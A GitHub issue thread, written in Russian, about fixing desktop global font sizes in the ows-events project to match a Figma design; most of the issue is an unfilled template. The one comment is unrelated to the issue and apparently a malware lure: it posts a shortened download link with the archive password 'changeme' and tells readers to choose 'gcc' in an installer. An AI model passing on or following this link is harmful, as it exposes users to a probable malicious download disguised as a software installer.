### ISSUE TITLE
Исправить глобальные стили для Desktop согласно Figma

### ISSUE THREAD

**Issue by safonovvvv** [openworld-community/ows-events#1328]
### Критичность
Укажите уровень критичности

### Описание
Исправить размер шрифтов для Desktop согласно таблице в фигме:
https://www.figma.com/design/13t1lYLJS4Oe7ZQWEfqqlx/Afisha-Backup?node-id=1-17019&t=vuXVD1FMy3mSGaCu-0

### Ожидаемое поведение
Опишите ожидаемое поведение

### Условия воспроизведение
- Device [e.g. iPhone6, Desktop]
- OS: [e.g. iOS, Windows]

### Шаги воспроизведения
Пошаговое описание условий возникновения бага

### Ссылка на родительскую задачу
[!IMPORTANT] Ссылка на родительскую задачу

### Скриншоты* (необязательное)
- **Ссылки на скриншоты или картинки**

### Дополнительная информация* (необязательное)
Добавьте информацию о баге которую вы считаете важной

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
